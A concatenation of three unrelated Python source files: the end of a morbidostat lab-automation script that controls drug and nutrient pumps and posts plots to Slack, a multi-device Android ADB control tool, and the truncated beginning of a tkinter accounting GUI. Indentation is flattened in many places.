# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot() #figsize=(10,10) in the plot
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("/mnt/morbidodata/%s/ODplot_%s.png" % (self.start_time, self.start_time))
ODplt = None; ODfig = None; fig = None
with open("/mnt/morbidodata/%s/ODplot_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
slack_client.api_call(
"files.upload",
channels='morbidotest',
title = "ODPlot",
file = file_content,
)
allpumps = pd.read_csv(self.outfile_pump, index_col='hour') # cols: 'media', 'drug','waste','pump_time','hour','drug_mass'
allconcs = allpumps[['drug_mass']]/12
allconcs.rename(columns={'drug_mass':'drug_conc'}, inplace=True)
# allODs['hour'] = allODs['time'] - allODs['time'].iloc[0]
# allODs['hour'] = allODs['hour'].divide(3600)
# allODs.set_index('hour')
# print(allODs)
#fig = plt.figure(dpi=1000)
colors = getattr(getattr(pd.plotting, '_style'), '_get_standard_colors')(num_colors=2)
plt.rcParams["figure.dpi"] = 200
ODplt = (allODs[['average']]).plot(label='average', color=colors[0]) #figsize=(10,10) in the plot
ODplt.set_ylabel(ylabel='Average OD')
lines, labels = ODplt.get_legend_handles_labels()
DM = ODplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allconcs.plot(ax = DM, label='drug_mass',color=colors[1],legend=False)
DM.set_ylabel(ylabel='Drug Concentration (ug/mL)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODplt.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODplt.get_figure()
ODfig.savefig("/mnt/morbidodata/%s/ODconc_%s.png" % (self.start_time, self.start_time),bbox_inches='tight')
ODplt.figure = None; ODplt = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
with open("/mnt/morbidodata/%s/ODconc_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
slack_client.api_call(
"files.upload",
channels='morbidotest',
title = "ODConc",
file = file_content,
)
pumpa = allpumps[['media','drug','waste']]
colors = getattr(getattr(pd.plotting, '_style'), '_get_standard_colors')(num_colors=4)
PUplt = (allODs[['average']]).plot(label='average', color=colors[0])
PUplt.set_ylabel(ylabel='Average OD')
lines, labels = PUplt.get_legend_handles_labels()
DM = PUplt.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=colors[1:4],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUplt.legend(lines, labels, loc=2)
PUfig = PUplt.get_figure()
PUfig.savefig("/mnt/morbidodata/%s/PUplot_%s.png" % (self.start_time, self.start_time))
allODs = None; allpumps = None; PUplt.figure = None; PUplt = None; PUfig = None; fig = None; allconcs= None; colors = None; DM = None; pumpa = None
with open("/mnt/morbidodata/%s/PUplot_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
slack_client.api_call(
"files.upload",
channels='morbidotest',
title = "PUPlot",
file = file_content,
)
# def graph_upload(self):
# with open("/mnt/morbidodata/%s/ODplot_%s.png" % (self.start_time, self.start_time), "rb") as file_content:
# slack_client.api_call(
# "files.upload",
# channels='morbidotest',
# title = "ODPlot",
# file = file_content,
# )
# slack_client.api_call(
# "files.upload",
# channels='morbidotest',
# filename = PUplt,
# title = "PUPlot",
# file = open("/mnt/morbidodata/%s/PUplot_%s.png" % (self.start_time, self.start_time), "rb"),
# as_user = True)
def morbidostat(self):
# for i in range(num_cham):
if self.avOD > OD_min:
threading.Thread(target=self.pump_on, args=(P_waste_pins,)).start()
threading.Timer(P_waste_times,self.pump_off, args=(P_waste_pins,)).start()
self.waste = 3
self.drug_mass = self.drug_mass - (self.drug_mass/12)
if self.avOD > OD_thr and self.avOD > self.last_dilutionOD:
print('OD Threshold exceeded, pumping cefepime')
threading.Thread(target=self.pump_on, args=(P_drug_pins,)).start()
threading.Timer(P_drug_times,self.pump_off, args=(P_drug_pins,)).start()
self.drug = 2
self.drug_mass = self.drug_mass + 2.5
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "OD = %0.3f, pumping cefepime. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12),
as_user=True)
else:
print('OD below threshold, pumping nutrient')
threading.Thread(target=self.pump_on, args=(P_nut_pins,)).start()
threading.Timer(P_nut_times,self.pump_off, args=(P_nut_pins,)).start()
self.nut = 1
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "OD = %0.3f, pumping nutrient. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12),
as_user=True)
else: #report even when pumps aren't activated yet
self.drug_mass = 0
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD),
as_user=True)
self.last_dilutionOD = self.avOD
def secondsToText(self,secs):
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
def on_timer(self):
if self.loops < total_time/time_between_ODs:
threading.Timer(time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('Experiment Complete at %02s:%02s:%02s ' % (self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
slack_client.api_call(
"chat.postMessage",
channel='#morbidotest',
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second),
as_user=True)
self.loops += 1
#print(self.loops)
# note the time the loop starts
self.now = datetime.now()
self.nows = time.time()
self.beginning = time.time()
# read OD data to be used for both controlling and saving during this loop
        threading.Thread(target=self.get_OD).start()
self.elapsed_time = self.start_time - self.now
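        # NOTE: start_time - now is a negative timedelta; Python normalises it to
        # (days=-1, seconds=86400 - elapsed), so the "86400 - self.elapsed_time.seconds"
        # expressions below recover the elapsed seconds (valid while the run is under 24 hours)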
# save the data to disk if it's time (threaded to preserve time b/w ODs if this takes > time_between_ODs)
        threading.Thread(target=self.savefunc).start()
#self.elapsed_time_h = datetime(1,1,1) + self.elapsed_time
print ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(86400 - self.elapsed_time.seconds),self.currOD))
# activate pumps if needed and it's time (threaded to preserve time b/w ODss if this takes > time_between_OD
if self.loops % (loops_between_pumps ) == 0:
            threading.Thread(target=self.morbidostat).start()
# Graph if it is time per the global var
if (self.loops % int(time_between_graphs*60/time_between_ODs)) == 0:
            threading.Thread(target=self.graphOD).start()
# note the time the functions end
self.end = time.time()
        self.interval = self.end - self.beginning
        # wait out the remainder so that each loop takes time_between_ODs in total
        if self.interval > time_between_ODs:
            print('warning: loop took longer than requested OD interval')
        else:
            time.sleep(time_between_ODs - self.interval)
#self.elapsed_loop_time += time_between_ODs
Morbidostat()
|
adb.py
|
#! /usr/bin/env python
# encoding: utf-8
# Copyright (c) 2015 Steinwurf ApS
# All Rights Reserved
#
# Distributed under the "BSD License". See the accompanying LICENSE.rst file.
import argparse
import subprocess
import threading
import time
import os
import re
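# Android KeyEvent codes, sent to devices via "adb shell input keyevent <code>"
# (e.g. 3 is KEYCODE_HOME, 4 is KEYCODE_BACK, 26 is KEYCODE_POWER)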
BUTTONS = {
"soft_right": 2,
"home": 3,
"back": 4,
"call": 5,
"endcall": 6,
"0": 7,
"1": 8,
"2": 9,
"3": 10,
"4": 11,
"5": 12,
"6": 13,
"7": 14,
"8": 15,
"9": 16,
"star": 17,
"pound": 18,
"dpad_up": 19,
"dpad_down": 20,
"dpad_left": 21,
"dpad_right": 22,
"dpad_center": 23,
"volume_up": 24,
"volume_down": 25,
"power": 26,
"camera": 27,
"clear": 28,
"a": 29,
"b": 30,
"c": 31,
"d": 32,
"e": 33,
"f": 34,
"g": 35,
"h": 36,
"i": 37,
"j": 38,
"k": 39,
"l": 40,
"m": 41,
"n": 42,
"o": 43,
"p": 44,
"q": 45,
"r": 46,
"s": 47,
"t": 48,
"u": 49,
"v": 50,
"w": 51,
"x": 52,
"y": 53,
"z": 54,
"comma": 55,
"period": 56,
"alt_left": 57,
"alt_right": 58,
"shift_left": 59,
"shift_right": 60,
"tab": 61,
"space": 62,
"sym": 63,
"explorer": 64,
"envelope": 65,
"enter": 66,
"del": 67,
"grave": 68,
"minus": 69,
"equals": 70,
"left_bracket": 71,
"right_bracket": 72,
"backslash": 73,
"semicolon": 74,
"apostrophe": 75,
"slash": 76,
"at": 77,
"num": 78,
"headsethook": 79,
"focus": 80,
"plus": 81,
"menu": 82,
"notification": 83,
"search": 84
}
class Command(object):
"""Wrapper for Popen which supports a timeout."""
def __init__(self, cmd, timeout):
"""initialize command."""
super(Command, self).__init__()
self.cmd = cmd
self.timeout = timeout
self.process = None
self.result = None
def run(self):
"""Run command."""
def target():
self.process = subprocess.Popen(
self.cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.result = self.process.communicate()
thread = threading.Thread(
target=target,
name=" ".join(self.cmd))
thread.start()
thread.join(self.timeout)
if thread.is_alive():
print("Error: '{}' took too long.".format(
" ".join(self.cmd)))
self.process.terminate()
thread.join()
if self.result:
return (
self.result[0],
self.result[1],
self.process.returncode)
else:
return (None, None, None)
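# Illustrative usage: Command(['adb', 'devices'], timeout=5).run() returns a
# (stdout, stderr, returncode) tuple, or (None, None, None) if the command never completed.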
class ADB(object):
"""docstring for ADB."""
def __init__(self, adb, threads, specific_devices):
"""initialize ADB."""
super(ADB, self).__init__()
self.adb = adb
self.cmd_semaphore = threading.BoundedSemaphore(value=threads)
self.print_mutex = threading.Lock()
self.__run([self.adb, 'start-server'])
self.specific_devices = specific_devices
def __run(self, cmd, timeout=20, print_cmd=False):
stdout = None
stderr = None
returncode = None
try:
self.cmd_semaphore.acquire()
if print_cmd:
self.__print(" ".join(cmd))
command = Command(cmd, timeout)
stdout, stderr, returncode = command.run()
except Exception as e:
self.__print("Error: ".format(e.message, " ".join(cmd)))
finally:
if print_cmd and stdout:
self.__print(stdout.strip())
if print_cmd and stderr:
self.__print(stderr.strip())
self.cmd_semaphore.release()
return stdout, stderr, returncode
def __print(self, message):
self.print_mutex.acquire()
print(message)
self.print_mutex.release()
def __get_devices(self):
outputs, _, _ = self.__run([self.adb, 'devices'])
if not outputs:
return []
outputs = [i for i in outputs.split('\n')[1:] if i]
devices = {}
for output in outputs:
output = output.split()
device_id = output[0]
if device_id == '????????????':
print('device with insufficient permissions found.')
continue
if output[1] == 'unauthorized':
print('unauthorized device found.')
continue
if self.specific_devices:
if device_id not in self.specific_devices:
continue
devices[device_id] = {'handle': device_id}
return devices
def __get_prop(self, handle, prop):
cmd = [self.adb, '-s', handle, 'shell',
'getprop', prop]
result, _, _ = self.__run(cmd)
if not result:
return ""
return result.strip()
def __version(self, handle):
version_string = self.__get_prop(handle, 'ro.build.version.release')
if version_string == "7.0":
version_string = "7.0.0"
version_split = version_string.split('.')
if len(version_split) != 3:
return (0, 0, 0)
major, minor, patch = version_split
return (int(major), int(minor), int(patch))
def __ip(self, handle):
return self.__get_prop(handle, 'dhcp.wlan0.ipaddress')
def __serial(self, handle):
return self.__get_prop(handle, 'ro.serialno')
def __brand(self, handle):
return self.__get_prop(handle, 'ro.product.brand')
def __model(self, handle):
return self.__get_prop(handle, 'ro.product.model')
def __is_wifi_off(self, handle):
return self.__get_prop(handle, 'init.svc.dhcpcd_wlan0') == 'stopped'
def __battery(self, handle):
cmd = [self.adb, '-s', handle, 'shell',
'cat', '/sys/class/power_supply/battery/capacity']
result, _, _ = self.__run(cmd)
if not result or 'No such file or directory' in result:
return "-"
return result.strip()
def __is_screen_locked(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys statusbar']
output, _, _ = self.__run(cmd)
if not output:
return True
output = output.strip()
result = 'mDisabled=0x1e00000' in output
result |= 'mDisabled1=0x3200000' in output
return result
def __is_screen_on(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys power']
output, _, _ = self.__run(cmd)
if not output:
return False
output = output.strip()
result = 'mScreenOn=true' in output or \
'SCREEN_ON_BIT' in output or \
'Display Power: state=ON' in output
return result
def __screen_size(self, handle):
version = self.__version(handle)
        if version[:2] < (4, 3):
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys window windows']
output, stderr, _ = self.__run(cmd)
result = re.search("Display: init=(\d+)x(\d+)", output)
if result is None:
return (0, 0)
width = int(result.group(1))
height = int(result.group(2))
return (width, height)
cmd = [self.adb, '-s', handle, 'shell', 'wm size']
output, stderr, _ = self.__run(cmd)
result = re.search("Physical size: (\d+)x(\d+)", output)
if result is None:
return (0, 0)
width = int(result.group(1))
height = int(result.group(2))
return (width, height)
def __orientation(self, handle):
# Returns None or 0, 1, 2, or 3.
        # 0 is portrait
        # 1 is landscape
        # 2 is portrait top down
# 3 is landscape top down
# This seems to fail occasionally, try a few time if we fail.
tries = 0
orientation = None
while orientation is None and tries < 10:
tries += 1
cmd = [self.adb, '-s', handle, 'shell', 'dumpsys input']
output, stderr, _ = self.__run(cmd)
for line in output.splitlines():
if 'SurfaceOrientation' in line:
orientation = int(line[-1])
break
else:
time.sleep(1)
        if orientation is None:
            print("Error: Unable to find SurfaceOrientation, "
                  "I'm guessing landscape.")
            return 1
        return orientation
def __push(self, handle, local, remote):
cmd = [self.adb, '-s', handle, 'push', local, remote]
self.__run(cmd)
def __install(self, handle, apk):
apk = os.path.abspath(apk)
cmd = [self.adb, '-s', handle, 'install', '-r', apk]
return self.__run(cmd, timeout=40)
def __running(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'shell', 'ps']
output, _, _ = self.__run(cmd)
return (handle, any(
[line.endswith(package_name) for line in output.splitlines()]))
def __is_off(self, handle):
        # adb is set to insecure when the tablet is off.
# It's unknown if this can happen in other situations.
is_adb_secure = self.__get_prop(handle, 'ro.adb.secure')
return is_adb_secure == '0'
def __has(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'shell', 'pm list packages']
output, _, _ = self.__run(cmd)
result = any(
[line.endswith(package_name) for line in output.splitlines()])
return (handle, result)
def __uninstall(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'uninstall', package_name]
self.__run(cmd, print_cmd=True)
def __stop(self, handle, package_name):
cmd = [self.adb, '-s', handle, 'shell',
'am', 'force-stop', package_name]
self.__run(cmd)
def __start(self, handle, package_name, activity='MainActivity',
action=None, data_string=None, parameters={}):
cmd = [self.adb, '-s', handle, 'shell', 'am', 'start', '-n']
cmd.append('{package_name}/.{activity}'.format(
package_name=package_name, activity=activity))
if data_string is not None:
cmd.append('-d {data_string}'.format(data_string=data_string))
if action is not None:
cmd.append('-a {action}'.format(action=action))
for parameter in parameters:
cmd.append('-e {key} {value}'.format(
key=parameter, value=parameters[parameter]))
self.__run(cmd)
def __press(self, handle, button):
key_id = str(BUTTONS[button])
cmd = [self.adb, '-s', handle, 'shell', 'input', 'keyevent', key_id]
self.__run(cmd)
def __shutdown(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'reboot', '-p']
self.__run(cmd)
def __reboot(self, handle):
cmd = [self.adb, '-s', handle, 'shell', 'reboot']
self.__run(cmd)
def __turn_on(self, handle):
if self.__is_off(handle):
self.__reboot(handle)
def __turn_screen(self, handle, turn):
screen = self.__is_screen_on(handle)
if screen != turn:
self.__press(handle, 'power')
def __unlock(self, handle):
self.__turn_screen(handle, True)
model = self.__model(handle)
if model in ["LG-E460", "SM-T555"]:
self.__swipe(handle, (100, 400), (300, 400))
return
if model == "T1-A21L":
_from = None
_to = None
orientation = self.__orientation(handle)
if orientation in [0, 2]:
# Potrait
_from = (400, 640)
_to = (800, 640)
elif orientation in [1, 3]:
# Landscape
_from = (100, 400)
_to = (1270, 400)
else:
print("ERROR, unable to get orientation!")
print(orientation)
self.__swipe(handle, _from, _to)
return
if model == "Nexus 4":
self.__swipe(handle, (300, 700), (300, 300))
return
# Try with menu button
self.__press(handle, 'menu')
def __tap(self, handle, location):
x, y = 0, 1
cmd = [self.adb, '-s', handle, 'shell',
'input', 'tap', str(location[x]), str(location[y])]
self.__run(cmd)
def __swipe(self, handle, start, end):
x, y = 0, 1
startx = start[x]
starty = start[y]
endx = end[x]
endy = end[y]
cmd = [self.adb, '-s', handle, 'shell',
'input', 'swipe',
str(startx), str(starty),
str(endx), str(endy)]
if self.__model(handle) != "LG-E460":
# duration in ms.
duration = 500
cmd += [str(duration)]
self.__run(cmd)
def __multithreaded_cmd(self, cmd, **kwargs):
devices = self.__get_devices()
threads = []
results = []
class FuncThread(threading.Thread):
def __init__(self, target, **kwargs):
self._target = target
self._kwargs = kwargs
self.result = None
threading.Thread.__init__(self)
def run(self):
self.result = self._target(**self._kwargs)
def join(self):
threading.Thread.join(self)
return self.result
print("running on {} devices.".format(len(devices)))
for d in devices:
t = FuncThread(target=cmd, handle=devices[d]["handle"], **kwargs)
t.start()
threads.append(t)
for thread in threads:
results.append(thread.join())
return results
def list_quick(self):
"""List the devices quickly."""
devices = self.__get_devices()
if not devices:
print("No devices detected.")
return
for d in devices:
print(d)
print("-" * 20)
print("total: {:3} device(s)".format(len(devices)))
def list(self):
"""List the devices."""
devices = self.__get_devices()
if not devices:
print("No devices detected.")
return
longest_line = 0
for d in sorted(devices.keys()):
handle = devices[d]['handle']
devices[d]['version'] = "{}.{}.{}".format(*self.__version(handle))
devices[d]['brand'] = self.__brand(handle)
devices[d]['model'] = self.__model(handle)
devices[d]['battery'] = self.__battery(handle)
if self.__is_off(devices[d]['handle']):
devices[d]['state'] = 'device off'
else:
screen_on = self.__is_screen_on(handle)
devices[d]['state'] = \
'screen on' if screen_on else 'screen off'
m = "{id:20} " \
"{brand:10} " \
"{model:12} " \
"{version:6} " \
"{battery:>3} % " \
"{state:3}".format(id=d, **devices[d])
print(m)
longest_line = max(longest_line, len(m))
lower_line = ("total: {:%s} device(s)" % (longest_line - 17)).format(
len(devices))
print("-" * len(lower_line))
print(lower_line)
def tap(self, location):
"""Tao on the screen."""
self.__multithreaded_cmd(self.__tap, location=location)
def swipe(self, start, end):
"""Swipe between two points."""
self.__multithreaded_cmd(self.__swipe, start=start, end=end)
def press(self, button):
"""Press a button."""
self.__multithreaded_cmd(self.__press, button=button)
def turn_screen(self, turn):
"""Turn the screen."""
self.__multithreaded_cmd(self.__turn_screen, turn=turn)
def install(self, apk):
"""Install apk."""
def cmd(handle, apk):
result = self.__install(handle, apk)
stdout = result[0].splitlines()
if stdout:
self.__print(stdout[-1])
else:
print(result[1])
self.__multithreaded_cmd(cmd, apk=apk)
def uninstall(self, package_name):
"""Uninstall package."""
self.__multithreaded_cmd(self.__uninstall, package_name=package_name)
def has(self, package_name):
"""Check if package is installed."""
state = self.__multithreaded_cmd(self.__has, package_name=package_name)
_id, has = 0, 1
result = [device[has] for device in state]
if all(result):
print("All the {} devices have {} installed.".format(
len(result), package_name))
return
print("{}/{} devices does not have {} installed:".format(
result.count(False),
len(result),
package_name))
for device in state:
if not device[has]:
print(" {}".format(device[_id]))
def running(self, package_name):
"""Check if application is running."""
state = self.__multithreaded_cmd(
self.__running, package_name=package_name)
_id, running = 0, 1
result = [device[running] for device in state]
if all(result):
print("All {} devices are running {}.".format(
len(result), package_name))
return
print("{}/{} devices are not running {}:".format(
result.count(False),
len(result),
package_name))
for device in state:
if not device[running]:
print(" {}".format(device[_id]))
def start(self, package_name, activity='MainActivity', action=None,
data_string=None, parameters={}):
"""Start application."""
self.__multithreaded_cmd(
self.__start, package_name=package_name, activity=activity,
action=action, data_string=data_string, parameters=parameters)
def stop(self, package_name):
"""Stop application."""
self.__multithreaded_cmd(self.__stop, package_name=package_name)
def restart(self, package_name):
"""Restart application."""
def cmd(handle, package_name):
self.__stop(handle, package_name=package_name)
self.__start(handle, package_name=package_name)
self.__multithreaded_cmd(cmd, package_name=package_name)
def shutdown(self):
"""Shutdown device."""
self.__multithreaded_cmd(self.__shutdown)
def turn_on(self):
"""Turn device on."""
self.__multithreaded_cmd(self.__turn_on)
def reboot(self):
"""Reboot device."""
self.__multithreaded_cmd(self.__reboot)
def unlock(self):
"""Unlock device."""
self.__multithreaded_cmd(self.__unlock)
def shell(self, arguments, log_type):
output_mutex = threading.Lock()
output = {}
def run_shell(handle):
cmd = [self.adb, '-s', handle, 'shell'] + arguments
out, err, ret = self.__run(cmd, timeout=None)
output_mutex.acquire()
output[handle] = out
output_mutex.release()
self.__multithreaded_cmd(run_shell)
        def file_logging(handle, content):
            with open("device_{id}.out".format(id=handle), 'w') as fout:
                fout.write(content)
def stdout_logging(handle, content):
print("Device: {id}\nOutput:\n{entry}".format(id=handle,
entry=content))
for key, entry in output.items():
if log_type == 'none':
return
elif log_type == 'stdout':
stdout_logging(key, entry)
elif log_type == 'file':
file_logging(key, entry)
def main():
"""Main function."""
parser = argparse.ArgumentParser(
description='Handle multiple android devices simultaneously.')
parser.add_argument('--adb', help='path to adb', default="adb")
parser.add_argument(
'--threads', type=int, help='the number of threads to use', default=10)
parser.add_argument(
'-s',
'--specific_devices',
help='Specific devices',
default=[],
action="append",
nargs='?')
subparsers = parser.add_subparsers(
dest='command',
help='Sub-command help')
list_parser = subparsers.add_parser('list', help='List devices.')
list_parser.add_argument(
'-q', '--quick',
help="A quick list of connected devices.",
action='store_true')
shell_parser = subparsers.add_parser('shell', help="Run a shell command.")
shell_parser.add_argument(
'--log_type',
help="Specify the logging approach. NB: If file is specified, already "
"existing files will be overwritten.",
default='none',
choices=['none', 'stdout', 'file'])
shell_parser.add_argument(
'shell_command',
help='Command to be executed, including arguments',
nargs='+')
def coordinate(input):
try:
x, y = map(int, input.split(','))
return x, y
        except ValueError:
            raise argparse.ArgumentTypeError("Coordinates must be x,y")
tap_parser = subparsers.add_parser(
'tap',
help='Simulate a tap on the screen.')
tap_parser.add_argument(
'location',
help="Coordinate (x,y)",
type=coordinate)
swipe_parser = subparsers.add_parser(
'swipe',
help='Simulate a swipe on the screen.')
swipe_parser.add_argument(
'start',
help="The beginning of the swipe (x,y)",
type=coordinate)
swipe_parser.add_argument(
'end',
help="The end of the swipe (x,y)",
type=coordinate)
press_parser = subparsers.add_parser('press', help="Press a button.")
press_parser.add_argument(
'button',
help="Button to press.",
choices=BUTTONS.keys())
subparsers.add_parser('shutdown', help="Shutdown device(s).")
subparsers.add_parser('turn_on', help="Turn on device(s).")
subparsers.add_parser('reboot', help="Reboot device(s).")
screen_parser = subparsers.add_parser('screen', help="Control screen.")
turn_values = {'on': True, 'off': False}
screen_parser.add_argument(
'turn',
choices=turn_values.keys(),
help='Turn the screen on or off.')
install_parser = subparsers.add_parser('install', help='Install APK.')
install_parser.add_argument('apk', help="APK to install.", nargs='?')
uninstall_parser = subparsers.add_parser(
'uninstall',
help="Uninstall application.")
uninstall_parser.add_argument(
'package_name',
help='Package name of the application to uninstall')
has_parser = subparsers.add_parser(
'has',
help="Check if a certain application is installed.")
has_parser.add_argument(
'package_name',
help='Package name of the application to check')
running_parser = subparsers.add_parser(
'running',
help="Check if a certain application is running.")
running_parser.add_argument(
'package_name',
help='Package name of the application to check')
start_parser = subparsers.add_parser('start', help="Start application.")
start_parser.add_argument(
'package_name',
help='Package name of the application to start')
start_parser.add_argument(
'--activity',
default='MainActivity',
help='Activity name of the application to start')
start_parser.add_argument(
'--action',
        default=None,
help='Action of the application to start')
start_parser.add_argument(
'-d', '--data_string',
        default=None,
help='data string to pass to the application')
start_parser.add_argument(
'-e', '--extras', metavar='key=value',
nargs='*',
default='',
help='data string to pass to the application')
stop_parser = subparsers.add_parser('stop', help="Stop application.")
stop_parser.add_argument(
'package_name',
help='Package name of the application to stop')
restart_parser = subparsers.add_parser(
'restart', help="Restart application.")
restart_parser.add_argument(
'package_name',
help='Package name of the application to restart')
subparsers.add_parser('unlock', help="Unlocks the screen. Note, this "
"command only works on Huawei "
"T1_A21L units.")
args = parser.parse_args()
adb = ADB(args.adb, args.threads, args.specific_devices)
if 'extras' in dir(args):
args.extras = \
{extra.split('=')[0]: extra.split('=')[1] for extra in args.extras}
{
'list': lambda args: adb.list_quick() if args.quick else adb.list(),
'tap': lambda args: adb.tap(args.location),
'swipe': lambda args: adb.swipe(args.start, args.end),
'press': lambda args: adb.press(args.button),
'shutdown': lambda args: adb.shutdown(),
'turn_on': lambda args: adb.turn_on(),
'reboot': lambda args: adb.reboot(),
'screen': lambda args: adb.turn_screen(turn_values[args.turn]),
'install': lambda args: adb.install(args.apk),
'uninstall': lambda args: adb.uninstall(args.package_name),
'has': lambda args: adb.has(args.package_name),
'running': lambda args: adb.running(args.package_name),
'start': lambda args: adb.start(args.package_name, args.activity,
args.action, args.data_string,
args.extras),
'stop': lambda args: adb.stop(args.package_name),
'shell': lambda args: adb.shell(args.shell_command, args.log_type),
'restart': lambda args: adb.restart(args.package_name),
'unlock': lambda args: adb.unlock()
}[args.command](args)
if __name__ == '__main__':
main()
|
Audit_main_screen.py
|
#time module
import time
import datetime
start = time.time()
#gui module
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
#system modules
import sys
import os
import threading
from termcolor import colored
#data processing and other data receiving modules
import sqlite3
from PIL import Image,ImageTk
from Audit_graph import graph_canvas
from Tally_people import advanced_data
import webbrowser
from Tally_viewer import viewer_api
import json
from Audit_upload import upload_to_cloud
#own module for variables and other settings
from Tally_date import date
from styling import *
from Tally_settings import setting
from user_config_window import check_user
'''
Failed modules that need to be replaced:
None
'''
def window_start():
#check user settings and start window
check_user()
print(colored("Audit future has started","green"))
window_ = Tk()
window_.title("Audit-Future" + " " + str(version))
window_.geometry("1350x700")
window_.config(bg=window_colour)
window_.iconbitmap(image_icon_main_window)
#place all the elements in the window
def put_the_elements():
window = Canvas(window_,bg=bg,border=0,highlightthickness=1, highlightbackground=bg)
window.pack(fill=BOTH,expand=True)
with open(user_database,"r") as read_file:
d = json.load(read_file)
def remove_text(element):
element.delete(0,END)
frame_debit = LabelFrame(window,text="Debited/Credited",bg=bg,fg=fg,border=5,font=(font,16))
frame_debit.grid(row=3,column=0,columnspan=1,rowspan=10,pady=20,padx=100)
if status_down == True:
window_branding = Label(window,bg=bg,fg=fg,font=(font,30),text=company_name)
window_branding.grid(row=1,column=2,sticky=W,columnspan=1,pady=10)
label_for_add_todays_details = Label(window,text="ADD TODAY'S REPORT",bg = bg , fg= fg)
label_for_add_todays_details.grid(row=2,column=1,columnspan=3,padx=10,pady=10)
label_for_add_todays_details.config(font=(font,20))
textbox_for_date = Entry(frame_debit,width=20)
textbox_for_date.grid(row=1,column=0,padx=10,pady=10)
textbox_for_date.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_date.insert(0,"YYYY/MM/DD")
textbox_for_date.bind("<Button-1>",lambda x: remove_text(textbox_for_date))
text_box_for_name = Entry(frame_debit,width=20)
text_box_for_name.grid(row=2,column=0,padx=10,pady=10)
text_box_for_name.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
text_box_for_name.insert(0,"Name")
text_box_for_name.bind("<Button-1>",lambda x: remove_text(text_box_for_name))
textbox_for_amount = Entry(frame_debit,width=20)
textbox_for_amount.grid(row=6,column=0,pady=10,padx=0)
textbox_for_amount.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_amount.insert(0,"Amount")
textbox_for_amount.bind("<Button-1>",lambda x: remove_text(textbox_for_amount))
textbox_for_category = Entry(frame_debit,width=20)
textbox_for_category.grid(row=3,column=0,padx=20,pady=10)
textbox_for_category.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_category.insert(0,"Category")
textbox_for_category.bind("<Button-1>",lambda x: remove_text(textbox_for_category))
clicked = StringVar()
chooose_option = ttk.Combobox(frame_debit,textvariable=clicked)
chooose_option['values'] = ("Credited","Debited","select")
chooose_option.config(width=15)
chooose_option.current(2)
chooose_option.grid(row=5,column=0,padx=10,pady=10)
if status_down == True:
status = Label(window,bd=1,height=30,relief=SUNKEN,bg=bg)
status.grid(row=24,column=0,columnspan=10,sticky=W+E,padx=20)
comapany_name_label = Label(status,bg=bg,fg=fg,font=(font,20),text=company_name)
comapany_name_label.grid(row=0,column=0,sticky=W+E)
comapany_phone_label = Label(status,bg=bg,fg=fg,font=(font,20),text=company_phone)
comapany_phone_label.grid(row=0,column=1,sticky=W+E)
comapany_mail_label = Label(status,bg=bg,fg=fg,font=(font,20),text=company_mail)
comapany_mail_label.grid(row=0,column=2,sticky=W+E)
textbox_for_site = Entry(frame_debit,width=20)
textbox_for_site.grid(row=4,column=0,padx=10,pady=10)
textbox_for_site.config(bg=textbox_bg,fg=textbox_fg,insertbackground=insert_fg)
textbox_for_site.insert(0,"Site No")
textbox_for_site.bind("<Button-1>",lambda x: remove_text(textbox_for_site))
top_status = Label(window,bd=1,bg=bg,fg=fg,font=font)
top_status.grid(row=0,column=0,sticky=W+E,columnspan=12)
#main window reload function
def reload_main_window():
window.destroy()
window_start()
img = Image.open(image_back) # PIL solution
        img = img.resize((50, 50), Image.ANTIALIAS)  # resize to (width, height) = (50, 50)
img = ImageTk.PhotoImage(img) # convert to PhotoImage
global i
i = 0
global x
x = 0
def insert_into_database():
i = 0
type_payement = str(clicked.get())
date_entered = str(textbox_for_date.get())
name_entered = str(text_box_for_name.get())
site_entered = str(textbox_for_site.get())
amount_entered = int(textbox_for_amount.get())
